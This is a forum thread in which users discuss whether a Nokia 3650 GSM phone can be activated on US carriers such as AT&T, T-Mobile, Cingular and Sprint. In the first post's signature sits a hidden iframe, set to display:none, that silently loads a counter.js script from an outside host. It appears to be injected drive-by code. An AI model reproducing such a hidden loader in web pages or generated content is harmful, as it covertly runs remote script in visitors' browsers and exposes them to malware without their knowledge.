+ Reply to Thread

Operating frequency: EGSM 900/1800 and 1900 networks world wide

Do any United States network providers support any of these frequencies? If so, which ones could I contact?

Thanks,
    Bobby<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    B. Schroeter

For GSM/GPRS, the US uses the 1900mhz frequency. I believe AT&T may also have obtained (or is in the process of obtaining) licenses to use GSM/GPRS in the 800mhz frequency.

Question

So are you telling me that I could get the Nokia 3650 and activate it on any service? I really want that phone and can get it, but I don't know if it will really work in the US.

http://www.nokia.com/phones/3650/

Thanks,
    Bobby
    B. Schroeter

No, that's not what I'm telling you. While that phone SHOULD TECHNICALLY work here in the US, it would be up to the service provider to be willing to activate it, something that is not a given. Sprint, for example, will not activate any phone who's ESN is not in its specific database. I don't know the policies of Voicestream/T-Mobile, AT&T, and Cingular (the main US GSM providers) in regards to that matter.

from what i've seen as long as it's compatible with their network and has a sim card slot then just about any gsm phone can be activated with crapular or att.

sprint really needs to jump onto the Wi-Fi bandwagon though...they're missing out on it.

if samsung is smart then the i-700 will have builtin wi-fi capability like the toshiba e740...

-jet